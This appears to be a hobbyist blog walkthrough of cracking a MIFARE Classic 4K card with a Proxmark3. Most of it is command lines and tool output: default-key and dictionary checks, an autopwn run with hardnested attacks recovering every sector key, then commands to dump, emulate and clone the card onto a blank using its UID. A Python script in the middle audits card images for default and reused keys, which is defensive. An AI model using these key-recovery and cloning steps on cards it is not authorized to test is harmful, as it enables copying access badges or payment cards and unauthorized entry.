I got myself a proxmark3 device lately, for fun.
I will not spend time explaining how to flash the device or install ProxSpace and pm3, as it is all explained here.
Let's start by identifying the card we have in hand.
[usb] pm3 --> hf search
[|] Searching for ISO14443-A tag…
[+] UID: 94 13 70 EE
[+] ATQA: 00 02
[+] SAK: 18 [2]
[+] Possible types:
[+] MIFARE Classic 4K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Prng detection……. hard
[?] Hint: try hf mf commands
[+] Valid ISO 14443-A tag found
What we have here is a MIFARE Classic 4K.
Let's see if we can find keys to decrypt this card with a simple (but fast) chk command.
[usb] pm3 --> hf mf chk --4k
[+] loaded 61 keys from hardcoded default array
[=] Start check for keys...
[=] .................................................................................
[=] time in checkkeys 12 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | ------------ | 0 | ------------ | 0
[+] 032 | 143 | ------------ | 0 | ------------ | 0
[+] 033 | 159 | ------------ | 0 | ------------ | 0
[+] 034 | 175 | ------------ | 0 | ------------ | 0
[+] 035 | 191 | ------------ | 0 | ------------ | 0
[+] 036 | 207 | ------------ | 0 | ------------ | 0
[+] 037 | 223 | ------------ | 0 | ------------ | 0
[+] 038 | 239 | ------------ | 0 | ------------ | 0
[+] 039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more details
Some keys are still missing … let's try a dictionary attack.
[usb] pm3 --> hf mf chk --4k -f mfc_default_keys
[+] loaded 61 keys from hardcoded default array
[+] Loaded 1887 keys from dictionary file `C:\_apps\ProxSpace\pm3\proxmark3\client\dictionaries/mfc_default_keys.dic`
[=] Start check for keys...
[=] ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
[=] time in checkkeys 249 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | ------------ | 0 | ------------ | 0
[+] 032 | 143 | ------------ | 0 | ------------ | 0
[+] 033 | 159 | ------------ | 0 | ------------ | 0
[+] 034 | 175 | ------------ | 0 | ------------ | 0
[+] 035 | 191 | ------------ | 0 | ------------ | 0
[+] 036 | 207 | ------------ | 0 | ------------ | 0
[+] 037 | 223 | ------------ | 0 | ------------ | 0
[+] 038 | 239 | ------------ | 0 | ------------ | 0
[+] 039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more details
Still no luck…
Let's be more aggressive with an autopwn attack, which basically runs all the available attacks (sparing us the hassle of trying them one by one or, in some cases, going block by block).
Note that I am skipping the -f mfc_default_keys.dic here since the previous dictionary attack did not prove useful.
[usb] pm3 --> hf mf autopwn --4k
[!] no known key was supplied, key recovery might fail
[+] loaded 5 user keys
[+] loaded 61 keys from hardcoded default array
[=] running strategy 1
[=] ...
[=] running strategy 2
[=] ....
[+] target sector 0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] target sector 0 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector 1 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 1 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 16 key type A -- found valid key [ A0A1A2A3A4A5 ]
[+] target sector 16 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector 17 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 17 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 18 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 18 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 19 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 19 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 20 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 20 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 21 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 21 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 22 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 22 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 23 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 23 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 24 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 24 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 25 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 25 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 26 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 26 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 27 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 27 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 28 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 28 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 29 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 29 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 30 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 30 key type B -- found valid key [ FFFFFFFFFFFF ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |
[=] 0 | 0 | Brute force benchmark: 509 million (2^28.9) keys/s | 140737488355328 | 3d
[=] 5 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 5226 ms | 140737488355328 | 3d
[=] 5 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 3d
[=] 10 | 112 | Apply bit flip properties | 35058302976 | 69s
[=] 11 | 224 | Apply bit flip properties | 24066930688 | 47s
[=] 12 | 334 | Apply bit flip properties | 17448558592 | 34s
[=] 13 | 444 | Apply bit flip properties | 9945160704 | 20s
[=] 14 | 555 | Apply bit flip properties | 9036183552 | 18s
[=] 15 | 667 | Apply bit flip properties | 7640147968 | 15s
[=] 16 | 779 | Apply bit flip properties | 6678748160 | 13s
[=] 17 | 890 | Apply bit flip properties | 6678748160 | 13s
[=] 18 | 1000 | Apply bit flip properties | 6347502592 | 12s
[=] 18 | 1112 | Apply bit flip properties | 6347502592 | 12s
[=] 18 | 1223 | Apply bit flip properties | 6347502592 | 12s
[=] 19 | 1332 | Apply bit flip properties | 6347502592 | 12s
[=] 20 | 1442 | Apply bit flip properties | 6347502592 | 12s
[=] 23 | 1552 | Apply Sum property. Sum(a0) = 128 | 262742304 | 1s
[=] 24 | 1664 | Apply bit flip properties | 262742304 | 1s
[=] 25 | 1771 | Apply bit flip properties | 262742304 | 1s
[=] 26 | 1879 | Apply bit flip properties | 262742304 | 1s
[=] 26 | 1879 | (Ignoring Sum(a8) properties) | 262742304 | 1s
[=] 27 | 1879 | Brute force phase completed. Key found: E704822D6AED | 0 | 0s
[+] target sector 31 key type A -- found valid key [ E704822D6AED ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |
[=] 0 | 0 | Brute force benchmark: 493 million (2^28.9) keys/s | 140737488355328 | 3d
[=] 3 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 2696 ms | 140737488355328 | 3d
[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 3d
[=] 7 | 112 | Apply bit flip properties | 646552223744 | 22min
[=] 8 | 224 | Apply bit flip properties | 495434760192 | 17min
[=] 9 | 336 | Apply bit flip properties | 474214105088 | 16min
[=] 10 | 448 | Apply bit flip properties | 422348587008 | 14min
[=] 11 | 560 | Apply bit flip properties | 422348587008 | 14min
[=] 12 | 671 | Apply bit flip properties | 422348587008 | 14min
[=] 13 | 783 | Apply bit flip properties | 422348587008 | 14min
[=] 14 | 893 | Apply bit flip properties | 422348587008 | 14min
[=] 15 | 1005 | Apply bit flip properties | 369272356864 | 12min
[=] 15 | 1117 | Apply bit flip properties | 369272356864 | 12min
[=] 16 | 1227 | Apply bit flip properties | 369272356864 | 12min
[=] 17 | 1338 | Apply bit flip properties | 369272356864 | 12min
[=] 17 | 1447 | Apply bit flip properties | 369272356864 | 12min
[=] 18 | 1559 | Apply bit flip properties | 369272356864 | 12min
[=] 19 | 1669 | Apply bit flip properties | 369272356864 | 12min
[=] 20 | 1776 | Apply bit flip properties | 369272356864 | 12min
[=] 21 | 1887 | Apply bit flip properties | 369272356864 | 12min
[=] 23 | 1997 | Apply Sum property. Sum(a0) = 128 | 54618914816 | 2min
[=] 24 | 2106 | Apply bit flip properties | 54618914816 | 2min
[=] 25 | 2215 | Apply bit flip properties | 54618914816 | 2min
[=] 25 | 2324 | Apply bit flip properties | 54618914816 | 2min
[=] 26 | 2324 | (Ignoring Sum(a8) properties) | 54618914816 | 2min
[=] 89 | 2324 | Brute force phase completed. Key found: EAE581E19550 | 0 | 0s
[+] target sector 31 key type B -- found valid key [ EAE581E19550 ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |
[=] 0 | 0 | Brute force benchmark: 411 million (2^28.6) keys/s | 140737488355328 | 4d
[=] 3 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 2965 ms | 140737488355328 | 4d
[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 4d
[=] 7 | 112 | Apply bit flip properties | 1300592066560 | 53min
[=] 8 | 224 | Apply bit flip properties | 956737191936 | 39min
[=] 9 | 336 | Apply bit flip properties | 788323893248 | 32min
[=] 10 | 448 | Apply bit flip properties | 699458519040 | 28min
[=] 11 | 559 | Apply bit flip properties | 611835576320 | 25min
[=] 12 | 669 | Apply bit flip properties | 604953968640 | 25min
[=] 13 | 781 | Apply bit flip properties | 546183413760 | 22min
[=] 14 | 891 | Apply bit flip properties | 497112612864 | 20min
[=] 15 | 1002 | Apply bit flip properties | 497112612864 | 20min
[=] 16 | 1110 | Apply bit flip properties | 497112612864 | 20min
[=] 18 | 1221 | Apply Sum property. Sum(a0) = 160 | 30699894784 | 75s
[=] 18 | 1331 | Apply bit flip properties | 29279275008 | 71s
[=] 19 | 1439 | Apply bit flip properties | 29279275008 | 71s
[=] 20 | 1547 | Apply bit flip properties | 29279275008 | 71s
[=] 21 | 1658 | Apply bit flip properties | 28913727488 | 70s
[=] 21 | 1658 | (1. guess: Sum(a8) = 0) | 28913727488 | 70s
[=] 22 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 28548368384 | 69s
[=] 22 | 1658 | (2. guess: Sum(a8) = 32) | 96629514240 | 4min
[=] 23 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 96404660224 | 4min
[=] 23 | 1658 | (3. guess: Sum(a8) = 64) | 201095266304 | 8min
[=] 25 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 199944667136 | 8min
[=] 25 | 1658 | Brute force phase completed. Key found: A989077ECCED | 0 | 0s
[+] target sector 32 key type A -- found valid key [ A989077ECCED ]
[+] target sector 32 key type B -- found valid key [ A989077ECCED ]
[+] target sector 33 key type A -- found valid key [ A989077ECCED ]
[+] target sector 33 key type B -- found valid key [ A989077ECCED ]
[+] target sector 34 key type A -- found valid key [ A989077ECCED ]
[+] target sector 34 key type B -- found valid key [ A989077ECCED ]
[+] target sector 35 key type A -- found valid key [ A989077ECCED ]
[+] target sector 35 key type B -- found valid key [ A989077ECCED ]
[+] target sector 36 key type A -- found valid key [ A989077ECCED ]
[+] target sector 36 key type B -- found valid key [ A989077ECCED ]
[+] target sector 37 key type A -- found valid key [ A989077ECCED ]
[+] target sector 37 key type B -- found valid key [ A989077ECCED ]
[+] target sector 38 key type A -- found valid key [ A989077ECCED ]
[+] target sector 38 key type B -- found valid key [ A989077ECCED ]
[+] target sector 39 key type A -- found valid key [ A989077ECCED ]
[+] target sector 39 key type B -- found valid key [ A989077ECCED ]
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+] 001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 016 | 067 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+] 017 | 071 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 018 | 075 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 019 | 079 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 020 | 083 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 021 | 087 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 022 | 091 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 023 | 095 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 024 | 099 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 025 | 103 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 026 | 107 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 027 | 111 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 028 | 115 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 029 | 119 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 030 | 123 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 031 | 127 | E704822D6AED | H | EAE581E19550 | H
[+] 032 | 143 | A989077ECCED | H | A989077ECCED | R
[+] 033 | 159 | A989077ECCED | R | A989077ECCED | R
[+] 034 | 175 | A989077ECCED | R | A989077ECCED | R
[+] 035 | 191 | A989077ECCED | R | A989077ECCED | R
[+] 036 | 207 | A989077ECCED | R | A989077ECCED | R
[+] 037 | 223 | A989077ECCED | R | A989077ECCED | R
[+] 038 | 239 | A989077ECCED | R | A989077ECCED | R
[+] 039 | 255 | A989077ECCED | R | A989077ECCED | R
[+] -----+-----+--------------+---+--------------+----
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA )
[?] MAD key detected. Try `hf mf mad` for more details
[+] Generating binary key file
[+] Found keys have been dumped to `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-key.bin`
[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0
[=] transferring keys to simulator memory ( ok )
[=] dumping card content to emulator memory (Cmd Error: 04 can occur)
[=] downloading card content from emulator memory
[+] Saved 4096 bytes to binary file `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-dump.bin`
[+] Saved to json file `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-dump.json`
[=] autopwn execution time: 166 seconds
Ok, this time we got lucky and all keys were found within 166 seconds (on my slow computer…).
Note that the keys have been conveniently dumped to hf-mf-941370EE-key.bin.
The content of the card itself has been dumped to hf-mf-941370EE-dump.bin.
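The final key table is worth reading from the card owner's side: 31 of the 40 sectors use keys the tool already ships with, and sectors 32 to 39 all share one key. The Python below is an added example, not part of the original post or of the Proxmark3 project. It audits a 4096-byte card image for exactly those two weaknesses and checks each trailer's access bits. It assumes the dump is a raw block image with both keys present in every sector trailer; the sample image is constructed from the keys in the table above, with access bytes FF 07 80 69 assumed.

```python
from collections import defaultdict

BLOCK = 16  # bytes per MIFARE Classic block
# Keys the page's output marks as dictionary hits (transport default and MAD keys).
DEFAULT_KEYS = {"FFFFFFFFFFFF", "A0A1A2A3A4A5", "B0B1B2B3B4B5"}


def trailer_block(sector):
    """Absolute block number of a sector trailer on a 4K card (the Blk column)."""
    if not 0 <= sector <= 39:
        raise ValueError("MIFARE Classic 4K has sectors 0..39")
    # Sectors 0-31 hold 4 blocks each, sectors 32-39 hold 16 blocks each.
    return sector * 4 + 3 if sector < 32 else 128 + (sector - 32) * 16 + 15


def access_bits_valid(trailer):
    """Bytes 6-8 store C1..C3 plus inverted copies; both copies must agree."""
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    return (b6 & 0x0F, b6 >> 4, b7 & 0x0F) == (c1 ^ 0x0F, c2 ^ 0x0F, c3 ^ 0x0F)


def audit_dump(dump):
    """Return (weak, reused, bad_acl) for a raw 4096-byte card image."""
    if len(dump) != 4096:
        raise ValueError("expected a 4096-byte MIFARE Classic 4K image")
    weak, bad_acl, sectors_by_key = [], [], defaultdict(set)
    for sector in range(40):
        off = trailer_block(sector) * BLOCK
        trailer = dump[off:off + BLOCK]
        keys = {"A": trailer[0:6].hex().upper(), "B": trailer[10:16].hex().upper()}
        for slot, key in keys.items():
            if key in DEFAULT_KEYS:
                weak.append((sector, slot, key))      # publicly known key
            else:
                sectors_by_key[key].add(sector)       # track non-default keys
        if not access_bits_valid(trailer):
            bad_acl.append(sector)
    # A non-default key protecting several sectors falls with a single recovery.
    reused = {k: sorted(s) for k, s in sectors_by_key.items() if len(s) > 1}
    return weak, reused, bad_acl


def build_sample_dump():
    """Constructed image: keys copied from the page's table, data blocks zeroed,
    access bytes FF 07 80 69 assumed (not shown on the page)."""
    dump = bytearray(4096)
    for sector in range(40):
        if sector in (0, 16):
            a, b = "A0A1A2A3A4A5", "B0B1B2B3B4B5"
        elif sector < 31:
            a = b = "FFFFFFFFFFFF"
        elif sector == 31:
            a, b = "E704822D6AED", "EAE581E19550"
        else:
            a = b = "A989077ECCED"
        off = trailer_block(sector) * BLOCK
        dump[off:off + BLOCK] = bytes.fromhex(a + "FF078069" + b)
    return bytes(dump)


if __name__ == "__main__":
    weak, reused, bad_acl = audit_dump(build_sample_dump())
    print(f"{len(weak)} key slots use a well-known key")
    for key, sectors in reused.items():
        print(f"key {key} is shared by sectors {sectors}")
    print("sectors with inconsistent access bits:", bad_acl)
```

To audit a real image, pass the bytes of the dump file to `audit_dump` instead of the constructed sample.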
At this stage you can dump the card (again) at any point with this command:
hf mf dump --4k --keys hf-mf-941370EE-key.bin
You can also simulate the card with this command:
hf mf sim -u 941370EE --4k
And last but not least, you can restore the dump to a blank card (effectively cloning the original card) with this command:
# for a gen1 card
hf mf cload --4k -f hf-mf-941370EE-dump.bin
# for a gen2 card - notice that you need the key file of the target card to be able to write your dump
# note that we are passing the original UID, sparing us the extra command hf mf csetuid -u 941370EE
hf mf restore --4k --uid 941370EE -k hf-mf-target-key.bin -f hf-mf-941370EE-dump.bin
Extra note: you can test reading a single block or sector with a known key the following way:
hf mf rdbl --blk 127 -b -k EAE581E19550
hf mf rdsc --sec 31 -a -k E704822D6AED